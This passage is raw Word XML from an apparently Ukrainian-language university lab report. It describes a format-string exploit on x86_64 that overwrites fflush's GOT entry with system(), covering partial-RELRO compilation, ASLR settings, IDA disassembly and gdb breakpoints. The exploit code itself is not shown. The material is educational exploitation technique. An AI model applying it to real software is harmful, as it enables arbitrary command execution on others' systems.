      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>$ python3 task</w:t>
      </w:r>
      <w:r w:rsidR="00877E72">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23524585" w14:textId="16F07FB3" w:rsidR="00943CEA" w:rsidRDefault="006C7AED" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="235FC441" wp14:editId="1F99ECC4">
            <wp:extent cx="6645910" cy="5391150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="104918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81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AD6C" w14:textId="3B29C33B" w:rsidR="00943CEA" w:rsidRPr="00985769" w:rsidRDefault="0058795E" w:rsidP="00F94F1A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC5535">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:t>У приклад</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:t xml:space="preserve"> експлоїту форматного рядка з 3.3 додайте можлив</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:t>сть ви</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>конання дов</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>льних команд ОС. Зверн</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>ть увагу на можлив</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>сть запису</w:t>
      </w:r>
      <w:r w:rsidR="00985769" w:rsidRPr="00985769">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>за дов</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t xml:space="preserve">льною адресою за допомогою </w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fmtstr</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>. Розгляньте вар</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t xml:space="preserve">ант </w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00DC5535">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00DC5535" w:rsidRPr="00985769">
        <w:t>86_64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61604A52" w14:textId="161124A8" w:rsidR="00943CEA" w:rsidRPr="003B6B53" w:rsidRDefault="003B6B53" w:rsidP="00565B0B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00A447AE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ключимо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D87AE80" w14:textId="77777777" w:rsidR="004A549A" w:rsidRPr="00826968" w:rsidRDefault="004A549A" w:rsidP="004A549A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826968">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo sysctl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00826968">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel.randomize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00826968">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_va_space=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25367E28" w14:textId="793E27B5" w:rsidR="004A549A" w:rsidRPr="00826968" w:rsidRDefault="004A549A" w:rsidP="004A549A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826968">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sysctl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00826968">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel.randomize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00826968">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_va_space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E5186" w14:textId="0288B941" w:rsidR="001322CE" w:rsidRDefault="001322CE" w:rsidP="004A549A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5237A9E9" wp14:editId="02DCC5E5">
            <wp:extent cx="6645910" cy="864235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2067525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5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19E" w14:textId="68622B9F" w:rsidR="00324E82" w:rsidRPr="00EF30F6" w:rsidRDefault="00EF30F6" w:rsidP="004A549A">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidR="004F2BBF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F2BBF" w:rsidRPr="00EF30F6">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>target.c</w:t>
      </w:r>
      <w:r w:rsidR="00D70123" w:rsidRPr="00EF30F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D70123">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">тепер </w:t>
      </w:r>
      <w:r w:rsidR="00F3382B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">не має </w:t>
      </w:r>
      <w:r w:rsidR="00D70123">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вразлив</w:t>
      </w:r>
      <w:r w:rsidR="00F3382B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ості</w:t>
      </w:r>
      <w:r w:rsidR="00D70123">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> перепов</w:t>
      </w:r>
      <w:r w:rsidR="00815B86">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="00D70123">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ення буфера</w:t>
      </w:r>
      <w:r w:rsidR="004F2BBF" w:rsidRPr="00EF30F6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E1A1E" w14:textId="3DFB4DF0" w:rsidR="002C37FC" w:rsidRDefault="002C37FC" w:rsidP="004A549A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CE9CFDE" wp14:editId="18A8AE68">
            <wp:extent cx="6645910" cy="2790190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="38639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71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1E57" w14:textId="77777777" w:rsidR="0049141E" w:rsidRDefault="0049141E" w:rsidP="004A549A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351CB6BE" w14:textId="73223E90" w:rsidR="00324E82" w:rsidRDefault="00743A13" w:rsidP="004A549A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Експлуатація форматного рядка потребує можливості запису в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, отже </w:t>
      </w:r>
      <w:r w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd64</w:t>
      </w:r>
      <w:r w:rsidRPr="00905516">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">треба компілювати з </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7206B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">частковим </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7206B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RELRO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E22C44" w14:textId="78F95241" w:rsidR="00EE6BD4" w:rsidRPr="00010544" w:rsidRDefault="00EE6BD4" w:rsidP="00EE6BD4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010544">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00D555E2" w:rsidRPr="00010544">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc -fstack-protector-all -Wl,-z,relro,-z,lazy -w -g target.c -o target.amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A89B50" w14:textId="1AC9093E" w:rsidR="00826968" w:rsidRDefault="00EE6BD4" w:rsidP="00EE6BD4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010544">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ checksec --file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00010544">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target.amd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00010544">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E019C" w14:textId="0E3B83BD" w:rsidR="00FA32E6" w:rsidRDefault="00FA32E6" w:rsidP="00FA32E6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C399994" wp14:editId="3CD27D1E">
            <wp:extent cx="6645910" cy="1198880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="169624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45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552" w14:textId="77777777" w:rsidR="00CC1E32" w:rsidRDefault="00CC1E32" w:rsidP="00CC1E32">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Часткове</w:t>
      </w:r>
      <w:r w:rsidRPr="00592108">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RELRO</w:t>
      </w:r>
      <w:r w:rsidRPr="00592108">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">робить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PLT</w:t>
      </w:r>
      <w:r w:rsidRPr="00592108">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>доступною тільки для читання (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="0026455E">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F5CD2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F3407" w14:textId="13C30457" w:rsidR="00CC1E32" w:rsidRPr="00EA78D5" w:rsidRDefault="00CC1E32" w:rsidP="00CC1E32">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Повне </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RELRO</w:t>
      </w:r>
      <w:r w:rsidRPr="0085672B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">робить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PLT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085672B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GOT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085672B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>доступн</w:t>
      </w:r>
      <w:r w:rsidRPr="0085672B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>им</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и тільки для читання</w:t>
      </w:r>
      <w:r w:rsidR="00935F93" w:rsidRPr="00935F93">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D137C74" w14:textId="0903FAED" w:rsidR="002A6294" w:rsidRPr="00EA78D5" w:rsidRDefault="002A6294" w:rsidP="00CC1E32">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Дизасемблюємо </w:t>
      </w:r>
      <w:r w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd64</w:t>
      </w:r>
      <w:r w:rsidRPr="00905516">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593232E4" w14:textId="1F964804" w:rsidR="00E572D1" w:rsidRDefault="00316B14" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63558D34" wp14:editId="64FDB050">
            <wp:extent cx="6645910" cy="3094355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="130358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2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7D1" w14:textId="77777777" w:rsidR="000F436B" w:rsidRDefault="00C152B5" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Нас цікавить</w:t>
      </w:r>
      <w:r w:rsidR="000F436B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5680BA" w14:textId="52A47DA5" w:rsidR="00886130" w:rsidRDefault="000F436B" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1. В</w:t>
      </w:r>
      <w:r w:rsidR="00C152B5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">разлива ф. </w:t>
      </w:r>
      <w:r w:rsidR="00C152B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidR="00C152B5" w:rsidRPr="00886130">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C152B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00C152B5" w:rsidRPr="00886130">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C152B5" w:rsidRPr="00886130">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C203C8A" w14:textId="46267FEF" w:rsidR="00E572D1" w:rsidRPr="002045AC" w:rsidRDefault="00886130" w:rsidP="00966211">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2. Ф.</w:t>
      </w:r>
      <w:r w:rsidR="000F436B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000F436B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fflush</w:t>
      </w:r>
      <w:r w:rsidR="000F436B" w:rsidRPr="00886130">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000F436B" w:rsidRPr="00886130">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="004D2451">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адресу якої будемо перезаписувати в</w:t>
      </w:r>
      <w:r w:rsidR="000F436B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F436B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GOT</w:t>
      </w:r>
      <w:r w:rsidR="004D2451">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на адресу ф. </w:t>
      </w:r>
      <w:r w:rsidR="004D2451">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="004D2451" w:rsidRPr="004D2451">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1DC47" w14:textId="3FBB412B" w:rsidR="004D2451" w:rsidRPr="006973C4" w:rsidRDefault="004D2451" w:rsidP="00966211">
      <w:r w:rsidRPr="004D2451">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Умовний перехід на початок циклу. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B9DE73" w14:textId="77777777" w:rsidR="00E572D1" w:rsidRPr="00886130" w:rsidRDefault="00E572D1" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06609DB0" w14:textId="47E38C25" w:rsidR="00E95B1B" w:rsidRPr="00EA78D5" w:rsidRDefault="002E74F3" w:rsidP="00966211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Виведемо адреси завантажених модулів, дизасемблюємо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA78D5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та п</w:t>
      </w:r>
      <w:r w:rsidR="00DD6075">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>оставимо брейкпоїнти в</w:t>
      </w:r>
      <w:r w:rsidR="003A32D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> цікавих</w:t>
      </w:r>
      <w:r w:rsidR="00DD6075">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> місцях у файлі</w:t>
      </w:r>
      <w:r w:rsidR="00DD6075" w:rsidRPr="00EA78D5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD6075" w:rsidRPr="001242F3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>breaks</w:t>
      </w:r>
      <w:r w:rsidR="00DD6075" w:rsidRPr="00EA78D5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64.</w:t>
      </w:r>
      <w:r w:rsidR="00DD6075" w:rsidRPr="001242F3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r w:rsidR="00DD6075">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14A66A" w14:textId="77777777" w:rsidR="00E95B1B" w:rsidRPr="00E95B1B" w:rsidRDefault="00E95B1B" w:rsidP="00E95B1B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">info </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40FEA8" w14:textId="77777777" w:rsidR="00E95B1B" w:rsidRPr="00E95B1B" w:rsidRDefault="00E95B1B" w:rsidP="00E95B1B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disas main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44765E2E" w14:textId="77777777" w:rsidR="00E95B1B" w:rsidRPr="00E95B1B" w:rsidRDefault="00E95B1B" w:rsidP="00E95B1B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95B1B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
